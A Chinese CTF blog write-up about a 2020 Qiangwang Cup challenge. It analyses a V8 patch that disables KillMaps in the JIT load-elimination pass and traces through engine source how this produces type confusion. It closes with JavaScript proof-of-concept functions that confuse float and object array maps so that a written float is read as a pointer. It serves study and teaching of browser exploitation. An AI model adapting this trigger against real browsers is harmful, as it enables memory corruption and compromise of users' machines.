chrome浏览器漏洞强化1

前言

强化学习，场景来自强网杯2020决赛的一道题。

顺序奇乱，看到什么想到什么就写什么，回过头来估计就看不懂了。

环境搭建

跟上一篇文章差不多，不过这次不切换分支了（记得把diff打上去），期间还遇到一个一个问题：

1	/root/v8/v8/buildtools/linux64/gn: /lib64/libc.so.6: version `GLIBC_2.18' not found (required by /root/v8/v8/buildtools/linux64/gn)

看起来是Glibc版本过低，更新的时候出了点奇奇怪怪的问题，所以换个Centos8再来一遍（yum install python2就能装上python2.7了），为了编译得快点，顺便换个更高配的主机。

然后就可以开始调试了，先用directory命令把源码目录配置进来。

diff分析

diff文件如下：

diff --git a/src/compiler/load-elimination.cc b/src/compiler/load-elimination.cc
index ff79da8c86..8effdd6e15 100644
--- a/src/compiler/load-elimination.cc
+++ b/src/compiler/load-elimination.cc
@@ -866,8 +866,8 @@ Reduction LoadElimination::ReduceTransitionElementsKind(Node* node) {
     if (object_maps.contains(ZoneHandleSet<Map>(source_map))) {
       object_maps.remove(source_map, zone());
       object_maps.insert(target_map, zone());
-      AliasStateInfo alias_info(state, object, source_map);
-      state = state->KillMaps(alias_info, zone());
+      // AliasStateInfo alias_info(state, object, source_map);
+      // state = state->KillMaps(alias_info, zone());
       state = state->SetMaps(object, object_maps, zone());
     }
   } else {
@@ -892,7 +892,7 @@ Reduction LoadElimination::ReduceTransitionAndStoreElement(Node* node) {
   if (state->LookupMaps(object, &object_maps)) {
     object_maps.insert(double_map, zone());
     object_maps.insert(fast_map, zone());
-    state = state->KillMaps(object, zone());
+    // state = state->KillMaps(object, zone());
     state = state->SetMaps(object, object_maps, zone());
   }
   // Kill the elements as well.

diff文件的修改简单来说就是注释掉了两个函数中调用KillMaps的部分。

触发ReduceTransitionElementsKind

先看看ReduceTransitionElementsKind函数究竟是个什么，往上找找这个函数：

switch (node->opcode()) {
    ...
    case IrOpcode::kTransitionElementsKind:
        return ReduceTransitionElementsKind(node);
}

执行kTransitionElementsKind这个操作码的时候会调用这个函数，再看看这个操作码的名字kTransitionElementsKind，看起来是个用于转换数组成员类型的操作码，给ReduceTransitionElementsKind函数打上断点（需要先用d8运行一个JavaScript脚本后才会加载这个符号进来）然后简单测试一下：

var a = [];
a[0] = 1;
a[0] = 1.1;
a[0] = {};

不会触发断点，看起来除了数组类型转换，还需要满足其他条件才行。

继续阅读源码，看看这个操作码所属的类IrOpcode，其中一部分如下：

class V8_EXPORT_PRIVATE IrOpcode {
 public:
  enum Value {
#define DECLARE_OPCODE(x, ...) k##x,
    ALL_OP_LIST(DECLARE_OPCODE)
#undef DECLARE_OPCODE
        kLast = -1
#define COUNT_OPCODE(...) +1
                ALL_OP_LIST(COUNT_OPCODE)
#undef COUNT_OPCODE
  };
}

看起来是给某个字符串加上个k然后定义操作码的地方，找找TransitionElementsKind：

#define SIMPLIFIED_OTHER_OP_LIST(V)     \
  ...
  V(TransitionElementsKind)             \
  ...

看起来归属于SIMPLIFIED类操作码，在simplified-operator.cc中能找到生成该操作的函数：

const Operator* SimplifiedOperatorBuilder::TransitionElementsKind(
    ElementsTransition transition) {
  return zone()->New<Operator1<ElementsTransition>>(  // --
      IrOpcode::kTransitionElementsKind,              // opcode
      Operator::kNoThrow,                             // flags
      "TransitionElementsKind",                       // name
      1, 1, 1, 0, 1, 0,                               // counts
      transition);                                    // parameter
}

可以看到返回类型是Operator，而前面switch的node结构体时相吻合：

class V8_EXPORT_PRIVATE Node final {
 public:
  ...
  IrOpcode::Value opcode() const {
    DCHECK_GE(IrOpcode::kLast, op_->opcode());
    return static_cast<IrOpcode::Value>(op_->opcode());
  }
  
  ...
  const Operator* op_;
}

从TransitionElementsKind函数继续往上找，找到js-native-context-specialization.cc中的ReduceElementAccess函数，再结合前面的ReduceTransitionElementsKind函数，它们似乎都是用于减少某些操作（类型转换、成员访问）次数用的，那就试试用循环将前面的测试代码多跑上很多次：

var a;
for (var i = 0;i < 10000;i++) {
   a = [];
   a[0] = 233;
   a[0] = 233.3;
   a[0] = {};
}

这次成功触发了ReduceElementAccess函数处的断点，但是没有触发ReduceTransitionElementsKind的断点，调试一下发现似乎是因为没有发生类型转换。

这个时候我们观察一下调用栈：

注意到runtime-complier，运行时编译，也就是JIT，JavaScript的JIT机制会将某一段经常运行的代码（warm）编译成汇编代码以求加快代码的执行速度，而如果这段代码比预计中运行的还要多（hot），JIT就会把这段代码加以优化来再加快执行速度，所以这些reduce函数其实就是JIT对于hot代码的加速处理。

所以我们可以通过打印优化代码的方式，看看JIT将这段代码变成了什么样子，用help参数看看d8程序的参数：

看起来–print-opt-code参数可以打印出优化代码，试一试：

上面是优化后的汇编代码的一部分，可以看到此时生成的数组是一个PACKED_ELEMENTS类型的数组，而这个类型是一个复合类型，里面可以放置整型、浮点、对象等各种类型的成员，所以我们改变它的成员类型时不会发生类型转换。

改一下声明数组的方式：

var a;
for (var i = 0;i < 10000;i++) {
   a = Array(0);
   a[0] = 233;
   a[0] = 233.3;
   a[0] = {};
}

此时的汇编代码：

此时的数组类型为PACKED_SMI_ELEMENTS，是一个整型数组，所以我们修改成员类型时会发生类型转换，就会触发ReduceTransitionElementsKind函数处的断点。然后v8就会通过这些代码，将这段经常执行的JavaScript代码编译成汇编代码，下次要执行时就会直接去调用这些汇编代码。从另一个角度来看，如果经常执行的代码来自一个函数，那么通过大量调用它来触发JIT机制并将其编译成汇编代码后，下次调用这个函数也会直接执行这些汇编代码，再如果这些JIT机制的编译代码中存在问题，这些问题导致的后果就会被保存在这些汇编代码中，我们就可以通过写一个函数的方式触发这些问题。

ReduceTransitionElementsKind

简化一下测试代码：

var a;
for (var i = 0;i < 10000;i++) {
    a = Array(0);
    a[1];
    a[0] = 233.3;
}

这个函数的流程还是很难理解的，先看看它的参数node：

可以看到这个node的操作类型为TransitionElementsKind，这种node应该是类似AST树节点的一个东西，那它上面应该还挂着操作对象等其他数据。继续往下看代码：

1	`ElementsTransition transition = ElementsTransitionOf(node->op());`

ElementsTransitionOf函数看来是从node的op（Operator即操作）中生成了一个用于后续转换的变量：

ElementsTransition const& ElementsTransitionOf(const Operator* op) {
    DCHECK_EQ(IrOpcode::kTransitionElementsKind, op->opcode());
    return OpParameter<ElementsTransition>(op); // OpParameter看起来是在从op中取参
}

// Helper to extract parameters from Operator1<*> operator.
template <typename T>
inline T const& OpParameter(const Operator* op) {
    return reinterpret_cast<const Operator1<T, OpEqualTo<T>, OpHash<T>>*>(op) // 强制类型转换
        ->parameter();
}

reinterpret_cast是C++中的强制类型转换，在这里他将Operator类型的op转换成了其子类Operator1类型，观察转换后的Operator1对象：

可以看到，此时reinterpret_cast做类之间的类型转换时，只是将一个类用另一个类的方式进行解析而已，它们的地址还是一样的。而Operator1是Operator的子类，所以转换为Operator1对象后，除了有Operator本身的一些成员外，它还会将后面地址的一些数据当作自己的成员，也就是：

private:
    T const parameter_;
    Pred const pred_;
    Hash const hash_;

这里parameter_成员的T类型就是ElementsTransitionOf函数传入的ElementsTransition类型：

// A descriptor for elements kind transitions.
class ElementsTransition final {
    public:
    enum Mode : uint8_t {
        kFastTransition,  // simple transition, just updating the map.
        kSlowTransition   // full transition, round-trip to the runtime.
    };

    ElementsTransition(Mode mode, Handle<Map> source, Handle<Map> target)
        : mode_(mode), source_(source), target_(target) {}

    Mode mode() const { return mode_; }
    Handle<Map> source() const { return source_; }
    Handle<Map> target() const { return target_; }

    private:
    Mode const mode_;
    Handle<Map> const source_;
    Handle<Map> const target_;
};

看起来是个用于描述类型转换的类，包括mode、source、target等三个属性。parameter_的赋值要回到ReduceElementAccess函数：

ElementAccessInfo access_info = access_infos.front();

// Perform possible elements kind transitions.
MapRef transition_target(broker(),
                         access_info.lookup_start_object_maps().front());
for (auto source : access_info.transition_sources()) {
    DCHECK_EQ(access_info.lookup_start_object_maps().size(), 1);
    MapRef transition_source(broker(), source);
    effect = graph()->NewNode(
        simplified()->TransitionElementsKind(ElementsTransition(
            IsSimpleMapChangeTransition(transition_source.elements_kind(),
                                        transition_target.elements_kind())
            ? ElementsTransition::kFastTransition
            : ElementsTransition::kSlowTransition,
            transition_source.object(), transition_target.object())),
        receiver, effect, control);
}

access_info是个ElementAccessInfo对象，这个类的注释如下：

1	`// This class encapsulates all information required to access a certain element.`

也就是说是个用于访问数组成员的类，打印一下看看（a[0]=233.3这一句时触发的断点）：

根据代码我们可以看到，转换的source来自access_info的transition_sources_属性，target来自lookup_start_object_maps_属性。这两个属性都是一个C++数组类型的数据，里面都只有一个成员，之后会包装进transition_souce和transition_target中。

前面提到的parameter_属性的mode就是根据transition_source和transition_target的成员类型决定的，它们的成员类型如下：

很明显就是我们对数组a做的类型转换（从整型到浮点），parameter_属性的source_和target_属性分别来自transition_source和transition_target的object函数，transition_source和transition_target都是MapRef类型的对象，它们的object函数经过调试可以找到定义：

// js-heap-broker.cc
#define DEF_OBJECT_GETTER(T)                                                 \
  Handle<T> T##Ref::object() const {                                         \
    return Handle<T>(reinterpret_cast<Address*>(data_->object().address())); \
  }
#endif  // DEBUG

HEAP_BROKER_SERIALIZED_OBJECT_LIST(DEF_OBJECT_GETTER)
HEAP_BROKER_POSSIBLY_BACKGROUND_SERIALIZED_OBJECT_LIST(DEF_OBJECT_GETTER)
HEAP_BROKER_BACKGROUND_SERIALIZED_OBJECT_LIST(DEF_OBJECT_GETTER)
HEAP_BROKER_NEVER_SERIALIZED_OBJECT_LIST(DEF_OBJECT_GETTER)
#undef DEF_OBJECT_GETTER

// heap-refs.h
#define HEAP_BROKER_POSSIBLY_BACKGROUND_SERIALIZED_OBJECT_LIST(V) \
  /* Subtypes of HeapObject */                                    \
  V(BigInt)                                                       \
  V(HeapNumber)                                                   \
  V(Map)

所以调用object()就是连续调用data_->object().address()，简单来说就是transition_source.data_.object_（其实也是前面的source变量）：

里面是个指针，把transition_source和transition_target的object结果都打印一下看看：

可以看到它们指向两个紧挨在一起的地址单元，很可能它们是指向一个新的指针的指针，再打印一轮看看：

可以看到，它们指向的数据最低位都是1，恰好符合v8中的指针存储方式，用job命令验证一下：

可以看到，这就是代表数组类型的两个Map属性了。

object_maps.contains判断

要进入被diff修改的代码处还需要满足两个条件，第一个不提，如果我们将代码修改为：

var a;
for (var i = 0;i < 10000;i++) {
    a = Array(0);
    a[0] = 233.3;
}

第二个条件：

1	`if (object_maps.contains(ZoneHandleSet<Map>(source_map)))`

就会无法通过。object_maps是一个对象Map属性的Set集合，里面存储了访问过的一些对象的Map属性，所以在进行类型转换之前，需要先访问一下这个数组内的成员，object_maps中才会存有这个数组的Map属性，即这里的source_map变量。

KillMaps

代码中还能看到一些zone类的使用，其注释如下：

// The Zone supports very fast allocation of small chunks of
// memory. The chunks cannot be deallocated individually, but instead
// the Zone supports deallocating all chunks in one fast
// operation. The Zone is used to hold temporary data structures like
// the abstract syntax tree, which is deallocated after compilation.
//
// Note: There is no need to initialize the Zone; the first time an
// allocation is attempted, a segment of memory will be requested
// through the allocator.
//
// Note: The implementation is inherently not thread safe. Do not use
// from multi-threaded code.

看起来是用来分配内存的，从开开始看代码下来：

Node* const object = NodeProperties::GetValueInput(node, 0);
Handle<Map> source_map(transition.source());
Handle<Map> target_map(transition.target());
Node* const effect = NodeProperties::GetEffectInput(node);
AbstractState const* state = node_states_.Get(effect);

可以看到，object、effect两个node都来自参数的node（即操作类型为TransitionElementsKind的node），node类的注释如下：

// A Node is the basic primitive of graphs. Nodes are chained together by
// input/use chains but by default otherwise contain only an identifying number
// which specific applications of graphs and nodes can use to index auxiliary
// out-of-line data, especially transient data.
//
// In addition Nodes only contain a mutable Operator that may change during
// compilation, e.g. during lowering passes. Other information that needs to be
// associated with Nodes during compilation must be stored out-of-line indexed
// by the Node's id.

大概就是说节点（node）是图（graph）的基本构成，每个节点有一个用于区分的ID且只有一个操作，节点之间通过input/use来连接：

// ---------------------------------------------------------------------------
// Input layout.
// Inputs are always arranged in order as follows:
//     0 [ values, context, frame state, effects, control ] node->InputCount()

可以看到，一共有五种输入（input），这里关注value（大概是该操作需要的操作对象/参数）和effect（动作/下一步操作）这两种输入，先看看value：

value_in和value_out就相当于进出节点的感觉。可以看到，这是个FinishRegion节点（调试可以发现跟在ReduceElementAccess函数中生成的不太一样，可能后面做了什么处理），代码中有一段关于FinishRegion节点的注释：

// If we previously recorded information about a const store on the given
// 'object', we might not have done it on the same node; e.g. we might now
// identify the object by a FinishRegion node, whereas the initial const
// store was performed on the Allocate node. We therefore remove information
// on all nodes that must alias with 'object'.

看起来是跟常量存储相关的节点（调试其Value节点是个Allocate节点，再继续可以看到是个NumberConstant节点，里面放了个数16，不知道做什么用的），此外，既然他是TransitionElementsKind操作的Value节点，那它应该是个与我们要进行类型转换的数组a有关的节点。

source_map和target_map就是前面提到过的两个Map属性，再看看effect变量：

是个CheckBounds节点，看起来是用来检查数组边界的，跟这次的主题没什么关系的样子。

然后是state，它从node_states_变量而来，这是个AbstractStateForEffectNodes对象，从名字上看起来是根据Effect节点获取相应的状态（state），其定义如下：

LoadElimination::AbstractState const*
    LoadElimination::AbstractStateForEffectNodes::Get(Node* node) const {
    size_t const id = node->id();
    if (id < info_for_node_.size()) return info_for_node_[id];
    return nullptr;
}

看起来，每个节点都有一个相应的状态，此时获取了TransitionElementsKind节点的Effect节点（CheckBounds）对应的状态，这是一个AbstractState对象，里面有个Print函数可以打印出其中的数据：

Allocate节点应该就是那个与JavaScript中数组a相关的节点，可以看到状态由maps和fields两种成员组成，看起来都跟节点有关，查看它们在源码里的定义可以发现，它们都有一个重要的属性叫做info_for_node_，v8可以根据节点从中取出相关的数据，具体的后面再说。

接下来就看关键的三行代码：

1
2
3

AliasStateInfo alias_info(state, object, source_map);
state = state->KillMaps(alias_info, zone());
state = state->SetMaps(object, object_maps, zone());

使用状态、对象和转换前Map属性制作了一个alias_info变量，看其名字可能是用于查找同名/同个节点的，具体用处还要往后看。此外我们还可以看到，在JIT中代表一个对象的节点跟其Map属性是分割开的，那么久可能存在一个情况，读写该对象时使用的类型不是放在该对象首个地址单元处的Map属性，而是保存在状态某个地方与该对象节点相关联的Map属性。

再看看KillMaps函数：

LoadElimination::AbstractState const* LoadElimination::AbstractState::KillMaps(
    const AliasStateInfo& alias_info, Zone* zone) const {
    if (this->maps_) {
        AbstractMaps const* that_maps = this->maps_->Kill(alias_info, zone);
        if (this->maps_ != that_maps) {
            AbstractState* that = zone->New<AbstractState>(*this);
            that->maps_ = that_maps;
            return that;
        }
    }
    return this;
}

基本上可以认为就是调用了this->maps_->Kill，不然就跟没调用没什么区别，maps_属性是个AbstractMaps对象，其定义如下：

// Abstract state to approximate the current map of an object along the
// effect paths through the graph.
class AbstractMaps final : public ZoneObject {
    public:
    ...

    private:
    ZoneMap<Node*, ZoneHandleSet<Map>> info_for_node_;
};

从注释来看，似乎是用于描述某个对象的Map属性的？可以看到里面只有一个属性info_for_node_，其是一个Map类型的对象，键为node值为Set，值的类型看起来很眼熟（ReduceTransitionElementsKind函数中的object_maps变量），我们回去看看：

ZoneHandleSet<Map> object_maps;
if (state->LookupMaps(object, &object_maps)) {
    ...
}

看起来它是从state中获得的，再跟一跟：

bool LoadElimination::AbstractState::LookupMaps(
    Node* object, ZoneHandleSet<Map>* object_map) const {
    return this->maps_ && this->maps_->Lookup(object, object_map);
}

bool LoadElimination::AbstractMaps::Lookup(
    Node* object, ZoneHandleSet<Map>* object_maps) const {
    auto it = info_for_node_.find(ResolveRenames(object));
    if (it == info_for_node_.end()) return false;
    *object_maps = it->second;
    return true;
}

可以看到，它最后就是来自state的maps_属性的info_for_node_属性，那么就是说，在JIT代码中，一个对象由一个节点表示，状态中保存着与该节点相关联的Map属性，需要使用时可以根据节点取出。

Kill

回到KillMaps，进入Kill函数：

LoadElimination::AbstractMaps const* LoadElimination::AbstractMaps::Kill(
    const AliasStateInfo& alias_info, Zone* zone) const {
    for (auto pair : this->info_for_node_) {
        if (alias_info.MayAlias(pair.first)) {
            AbstractMaps* that = zone->New<AbstractMaps>(zone);
            for (auto pair : this->info_for_node_) {
                if (!alias_info.MayAlias(pair.first)) that->info_for_node_.insert(pair);
            }
            return that;
        }
    }
    return this;
}

遍历了info_for_node_属性这个Map，pair.first代表键即节点，这里的关键在于MayAlias函数：

bool LoadElimination::AliasStateInfo::MayAlias(Node* other) const {
    // If {object} is being initialized right here (indicated by {object} being
    // an Allocate node instead of a FinishRegion node), we know that {other}
    // can only alias with {object} if they refer to exactly the same node.
    if (object_->opcode() == IrOpcode::kAllocate) {
        return object_ == other;
    }
    // Decide aliasing based on the node kinds.
    if (!compiler::MayAlias(object_, other)) {
        return false;
    }
    // Decide aliasing based on maps (if available).
    Handle<Map> map;
    if (map_.ToHandle(&map)) {
        ZoneHandleSet<Map> other_maps;
        if (state_->LookupMaps(other, &other_maps) && other_maps.size() == 1) {
            if (map.address() != other_maps.at(0).address()) {
                return false;
            }
        }
    }
    return true;
}

用于判断两个节点是否是同一个，综合Kill和MayAlias函数起来看，意思就是，如果一个状态中有两个或更多节点关联着同一个Map属性，就会新建一个新的AbstractMaps对象（也就是跟状态中的maps_属性相同类型），然后将其他与此Map属性无关的节点-属性对应放进这个新的AbstractMaps对象中，简单来说就是把跟这个要被转换的Map属性从状态里面删掉了，最后将新的AbstractMaps对象返回。

再结合起KillMaps函数，如果Kill函数返回了一个新的AbstractMaps对象，就会用其包装一个新的状态再返回。

最后总结，KillMaps函数的作用就是将这个要被转换的Map属性从状态里面删掉，setMaps的作用就是将新的Map属性放入状态中并与此节点再次关联起来，这样就避免了当一个状态中有两个或更多节点关联着同一个Map属性时，前面一个节点发生了类型转换修改了其关联着的Map属性，后一个/一些节点还保留着旧的Map属性（这样不同节点就会以不同类型访问同个数组对象，造成类型混淆）。而题目中注释掉了这行代码，就会导致这个要被转换的Map属性被保留了下来，而setMaps只会修改该发生类型转换节点的Map属性，而其他节点没有修改，导致一个类型混淆漏洞。

类型混淆

要制造”一个状态中有两个或更多节点关联着同一个Map属性”这个情况，用函数传参来做是最方便的：

function optCode(a, b) {
    a[0];
    a[0] = 1.1;
    b[0];
    b[0] = {};
}

var a;
for (var i = 0;i < 10000;i++) {
    a = Array(0);
    optCode(a, a);
}

第一次类型转换的setMaps前：

第一次类型转换的setMaps后：

第二次类型转换的setMaps前：

第二次类型转换的setMaps后：

可以看到，两个节点相关联的Map属性已经产生了区别，a把它当作浮点数组，b把它当作对象数组，而它实际上已经是个对象数组，这样一来类型混淆就产生了。经过测试我们发现，这种Map属性不一致（对象数组和浮点数组）的情况下函数返回之后a会是一个对象数组，所以我们可以让a把它当作对象数组，b把它当作浮点数组，这样我们就可以通过写b将一个浮点数写入进去，后面访问的时候就会把这个浮点数当作一个指针。

实际上这样利用还是无法成功，因为函数代码比较简单，所以JIT在编译阶段可以获得的信息比较充分，类型判断简单，我们可以通过添加条件判断的方式绕过：

function optCode(a, b, f1, f2) {
    a[0];
    b[0];
    if (f1) {
        a[0] = {};
    }
    if (f2) {
        b[0] = 1.1;
    }
    
}

var a;
for (var i = 0;i < 10000;i++) {
    a = Array(0);
    optCode(a, a, true, false);
    a = Array(0);
    optCode(a, a, false, true);
}

a = Array(0);
optCode(a, a, true, true);
%DebugPrint(a);
%SystemBreak();
print(a[0]);